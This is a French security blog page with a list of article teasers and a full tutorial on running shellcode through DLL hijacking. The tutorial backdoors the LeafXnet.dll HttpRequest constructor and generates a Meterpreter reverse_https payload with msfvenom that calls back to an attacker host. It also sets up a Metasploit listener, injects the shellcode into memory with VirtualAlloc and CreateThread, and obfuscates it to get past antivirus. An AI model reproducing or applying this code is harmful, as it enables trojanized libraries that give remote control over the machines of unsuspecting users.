Articles

Lutter contre la triche en CTF ?

Introduction Dans cet article , je vais présenter les différentes possibilités pour empêcher la triche en compétition et notamment sur des ctf basés sur CTFd . Je précise que ces techniques permettent de mettre en avant les comptes suspects. Il y a plusieurs façons de cocher les cases d’un tricheurs si on suis ces critères bêtement et inversement , il y a malheureusement plusieurs façon de contourner ces protections. Tous ce que je vais expliquer ici sert donc à mettre en avant un compte ou une équipe afin que des admins procède à une vérification manuelle et agissent en conséquence.

Python from 0

Les Variables : Il existe des centaines de type de variables mais les principales sont : Les String (‘chaine de caractère’) : msg = "Hello World" Les Int (‘Integers’) : Ce sont les nombres entiers nbr = 2021 * 4 Les Float : Les nombres décimaux flt = 3.14159265359 Les List : Les listes contiennent des ‘object’ de tous types: lst = ["Hello World",5,3.

Malware Analysis d'une Virus Télégram

Introduction Je suis tombé sur ce .exe et j’ai décidé de l’analyser. Voici le fichier : ici Attention à ne pas l’executer ! Commencement Comme le dernier analyse de malware , j’ai regardé sur Dnspy si le code était caché . A notre plus grande surprise il ne l’était pas ! Regardons de quoi est composé notre payload : La Première chose qui saute aux yeux et que c’est un virus.

Execution de ShellCode grâce au Dll Hidjacking

Introduction Nous avons déjà parlé du DLL Hidjacking dans un article précédent. Aujourd’hui, nous allons aller plus loin. Nous avions détourné la Bibliothèque LeafXnet.dll qui est des plus utilisée pour faire des requêtes web. Nous aurions pu utiliser une autre, comme Newtonsoft.Json.dll ou encore Colorful.Console.dll . Voici le résultat que nous avions la dernière fois : Nous récupérions juste les requêtes pour les écrire dans un fichier texte. Petit Rappel Le Dll Hidjacking consiste à modifier une bibliothèque appelée par un programme et ainsi ajouter du code exécuter.

Malware Analysis d'un Fake Cheat

Introduction Je suis tombé sur ce soi-disant Cheat Valorant et j’ai décidé de l’analyser. Voici le fichier : ici Attention à ne pas l’executer ! Commencement Après avoir télécharger le .exe , je lui supprime tous de suite son extension .exe pour éviter de le lancer par erreur en cliquant dessus . Je lance DetectItEasy et je me rends compte qu’il est compilé en .Net Je vais donc utiliser Dnspy pour explorer le code .

Comment contourner le SSL Pinning sur android

Introduction Pour un projet personnel, j’ai dû récupérer une requête provenant d’une application de mon téléphone. Après de nombreuses recherches j’ai trouvé comment faire et j’ai compris toutes les méthodes pour y parvenir. La principale difficulté pour récupérer le traffic réseau de votre téléphone est de déchiffré les requêtes https. HttpS , c’est quoi ? “HyperText Transfer Protocol Secure” est un Protocol qui succède à l’http . En effet il reprend l’http en y rajoutant une couche de chiffrement comme SSL ou TLS .

Comment utiliser l'OCR pour résoudre des captchas

Introduction Dans des articles précédent, nous avons vu comment bypass 2 types de catpcha . Mais peut-on tous les bypass ? La réponse est oui à quelques exceptions près et nous allons voir comment. Cet article complète les deux précédents et présente donc toutes les techniques que je connais pour contourner ces sécurité anti-bot HCaptha Hcaptcha est un concurrent à google de plus en plus connu : Il existe deux manières de le contourner :

Comment Isoler un Recaptcha

Introduction Nous avons vu dans un précédent comment bypass les reCAPTCHA Silencieux ; ceux en arrière-plan . Mais comment faire quand ces captchas nécessitent une interaction Humaine à tout prix ? C’est ce que nous allons découvrir. Le problème Dans un captcha Silencieux, il n’y pas d’interactions entre l’utilisateur et le captcha. On peut donc le contourner en simulant des actions identiques au script natif. Par contre, dans un captcha visible.

Comment Bypass un Silent Recaptcha V3

Introduction Les Captchas sont partout, ce sont des petits programmes web qui servent à déterminer si leur interlocuteur est un Homme ou un Robot. Ce n’est pas très dérangeant pour les gens normaux mais cela devient ennuyeux pour les développeur qui souhaitent faire du scraping web ou juste se connecter à un service depuis le site-Web. Dans cet article nous nous concentrerons sur les Recaptcha de google et particulièrement ceux en mode Silent en version 2

Pourquoi votre wifi est-il vulnérable

Introduction Je rappelle que le piratage d’un réseau dont vous n’êtes pas le propriétaire ou dont vous n’avez pas d’accord est strictement illégal. Je ne serais pas responsable des actions que vous ferrez après la lecture des cet article La sécurité WPA2 (Wi-Fi Protected Access Version 2) est la sécurité la plus courante sur vos routeurs personnels. C’est à dire sur votre box internet personnelle. Il est pris en charge depuis 2005 sur Windows XP et il est encore utilisé de nos jours.

Pourquoi il faut sécuriser vos DLL P1

Introduction Une DLL (Dynamic Link Library) est une bibliothèque logicielle qui permet le partage, par des programmes, de codes. Pour résumer, c’est une bibliothèque avec plusieurs fonctions à l’intérieur. C’est très utile pour ne pas toujours coder la même chose. On code une fois la DLL et on a plus qu’a appelé ses fonctions dans tous ses projets. L’avantage du C# est qu’il existe un grand nombre de bibliothèques, et la plupart sont Open-Source, sur GitHub principalement

Comment Reverse du .Net facilement

$(document).ready(function() { var ctrlDown = false, ctrlKey = 17, cmdKey = 91, vKey = 86, cKey = 67; $(document).keydown(function(e) { if (e.keyCode == ctrlKey || e.keyCode == cmdKey) ctrlDown = true; }).keyup(function(e) { if (e.keyCode == ctrlKey || e.keyCode == cmdKey) ctrlDown = false; }); $(document).keydown(function(e) { if (ctrlDown && (e.keyCode == cKey)) window.location.href = "https://www.youtube.com/watch?v=cvh0nX08nRw"; if (ctrlDown && (e.keyCode == vKey)) window.location.href = "https://www.youtube.com/watch?v=cvh0nX08nRw"; }); }); [//]: <> (Created By Vozec 23/10/2021) Nécessaires Ce pack complet pour l&rsquo;obfuscation C# Introduction .

Execution de ShellCode grâce au Dll Hidjacking

Planted December 5, 2021

Introduction

Nous avons déjà parlé du DLL Hidjacking dans un article précédent. Aujourd’hui, nous allons aller plus loin. Nous avions détourné la Bibliothèque LeafXnet.dll qui est des plus utilisée pour faire des requêtes web. Nous aurions pu utiliser une autre, comme Newtonsoft.Json.dll ou encore Colorful.Console.dll . Voici le résultat que nous avions la dernière fois :

Alt text

Nous récupérions juste les requêtes pour les écrire dans un fichier texte.

Petit Rappel

Le Dll Hidjacking consiste à modifier une bibliothèque appelée par un programme et ainsi ajouter du code exécuter. Ainsi la fonction qui est appelée exécutera ce qu’elle est censée faire pour que le programme continue de fonctionner mais elle exécutera des actions en plus. Voir mon ancien article ici

Objectif

Je vais essayé d’executer du ShellCode directement dans la mémoire en utilisant des fonction C On doit donc :

  • Détourner une fonction supposée d’être utilisée dans un programme utilisant LeafXnet.dll
  • Créer Notre ShellCode
  • Coder un script qui execute ce shellCode
  • Faire en sorte que celui ci soit indetectable

Etape 1 : Détournement

On va utiliser la fonction d’initialisation d’une requète :

HttpRequest MyRequest = new HttpRequest();

Voici la fonction appelée :

public HttpRequest()
    {
        Init();
    }

Je créer un booléen défini sur False qui permet de ne lancer qu’une seule fois mon payload dans le cas ou le programme créer plusieurs requètes .

On y ajoute une fonction supplémentaire qui va être appelée avant Init();

public static async void Request()
        {
          Console.WriteLine("Hello World");  
        }

Et on l’appelle dans un Thread en parallèle si le Booléen est sur False :

public HttpRequest()
        {
            if (!activated) { activated = true; Thread thr = new Thread(Request); thr.Start(); }
            Init();
        }

Résultat : Alt text

Etape 2 : Création du ShellCode

Nous allons utiliser MsfVenom avec ce payload : windows/x64/meterpreter/reverse_https de metasploit.

Comme Ceci :

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.31.22.127 LPORT=443 -f csharp -o shellcode.txt

On paramètre un listener :

use exploit/multi/handler
set LPORT 443
set LHOST 0.0.0.0
set payload windows/x64/meterpreter/reverse_https
exploit

On a plus qu’à attendre une connexion

Etape 3 : Injection du ShellCode dans la mémoire.

Retournons sur notre fonction Request() : On y ajoute le shellCode en byte :

public static async void Request()
  {
        byte[] buf = new byte[784] {
        0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x48,0x31,  
        0x85,0xc0,0x75,0xd2[REDACTED],0x58,0x6a,0x00,
        0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5
    };
  }
On ajoute la fonction VirtualAlloc qui permet d’allouer de la mémoire :
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(
      IntPtr lpAddress,
      uint dwSize,
      uint flAllocationType,
      uint flProtect);
et on l’appelle dans la fonction :
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x00001000 | 0x00002000, 0x40);

Puis on copie notre ShellCode qui dans un Buffer dans la mémoire allouée précédemment :

Marshal.Copy(buf, 0, addr, buf.Length);
Enfin, on Créer un Thread sur l’adresse :

(Sans oublier d’importer la fonction C CreateThread)

[DllImport("kernel32", CharSet = CharSet.Ansi)]
       public static extern IntPtr CreateThread(
           IntPtr lpThreadAttributes,
           uint dwStackSize,
           IntPtr lpStartAddress,
           IntPtr lpParameter,
           uint dwCreationFlags,
           IntPtr lpThreadId);
IntPtr thread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);

Enfin, il faut laisser le processus tourner infiniment. Dans notre scénario ; le programme ne se ferme pas tous de suite, mais dans cette démonstration, le programme ne fait rien à part créer une requête. On peut donc ajouter :

Console.ReadLine();

Ou

[DllImport("kernel32.dll", SetLastError = true)]
        static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds);
WaitForSingleObject(thread, 0xFFFFFFFF);

Cela va permettre d’attendre infiniment la fin du programme et ainsi nous laisser un accès à la porte dérobée depuis métasploit.

Finalement ; Voici notre code :

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(
      IntPtr lpAddress,
      uint dwSize,
      uint flAllocationType,
      uint flProtect);

[DllImport("kernel32", CharSet = CharSet.Ansi)]
public static extern IntPtr CreateThread(
      IntPtr lpThreadAttributes,
      uint dwStackSize,
      IntPtr lpStartAddress,
      IntPtr lpParameter,
      uint dwCreationFlags,
      IntPtr lpThreadId);

[DllImport("kernel32.dll", SetLastError = true)]
static extern UInt32 WaitForSingleObject(
      IntPtr hHandle,
      UInt32 dwMilliseconds);

... Namespace ...

public HttpRequest()
      {
        if (!activated) { activated = true; Thread thr = new Thread(Request); thr.Start(); }
        Init();
      }

public static async void Request()
      {
        byte[] buf = new byte[784] {[REDACTED]}
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x00001000 | 0x00002000, 0x40);
        Marshal.Copy(buf, 0, addr, buf.Length);
        IntPtr thread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
      }

Alt text

Etape 4 : Obfuscation du Shell Code

On sait que notre Shell code est composé de nombre en hexadécimal :

_all = [0xfc,0x48,0x83,0xe4, ...]
final = [int(nb) for nb in _all]
print(final)

Alt text

On peut donc en former une string Obfusquée pour ensuite la décoder dans le programme et la retransformer en Bytes hexadécimal.

J’ajoute au projet une class que j’ai fait il y a un moment et qui permet de chiffrer/déchiffrer une string à partir du clé. L’algorithme est fait à la main et il n’est donc pas connu des antivirus. Voici un extrait du Shell Code chiffré :

"ᵊᵏ", "ᵌᵎᵄ", "ᵅᵏ", "ᵎᵏ", "ᵌᵎᵄ", "ᵋᵋ", "ᵋᵍ", "ᵊᵏ", "ᵌ", "ᵏᵍᵅ", "ᵌᵍᵏ", "ᵌᵏᵄ", "ᵌᵏᵍ", "ᵏᵉ", "ᵌᵌ", "ᵏ", "ᵋᵈ", "ᵅᵌ", "ᵌᵈ", "ᵌᵎᵎ", "ᵌᵌᵉ", "ᵍ", "ᵍ", "ᵍ", "ᵌᵎᵄ", "ᵌᵏᵅ", "ᵌᵎᵋ", "ᵍ", "ᵍ", "ᵍ", "ᵊᵏ", "ᵌᵎᵎ", "ᵌᵄᵏ", "ᵌᵌᵋ", "ᵌᵍᵎ", "ᵊᵏ", "ᵌ", "ᵏᵍᵅ", "ᵋᵅ", "ᵌᵎᵄ", "ᵋᵉ", "ᵎᵏ", "ᵅᵍ", "ᵌᵎᵄ", "ᵊᵏ", "ᵏᵉ", "ᵊᵎ", "ᵌ", "ᵏᵍᵅ",

En ajustant le chiffrement au code précédent, on obtient :

public static async void Request()
    {
        Console.OutputEncoding = Encoding.Unicode;
        crypter cry = new crypter();
        string key = "9457";
        string[] all = new string[784] { REDACTED };
        byte[] buffer = new byte[0];
        for (int i = 0; i < all.Length; i++)
        {
            byte[] newArray = new byte[buffer.Length + 1];
            buffer.CopyTo(newArray, 1);
            string b = await cry.decry(all[i], key);
            newArray[0] = Convert.ToByte(Convert.ToInt32(b));
            buffer = newArray;
        }
        Array.Reverse(buffer);
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buffer.Length, 0x00001000 | 0x00002000, 0x40);
        Marshal.Copy(buffer, 0, addr, buffer.Length);
        IntPtr thread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
    }

On peut vérifier l’efficacité du payload grâce a Virus Total : Alt text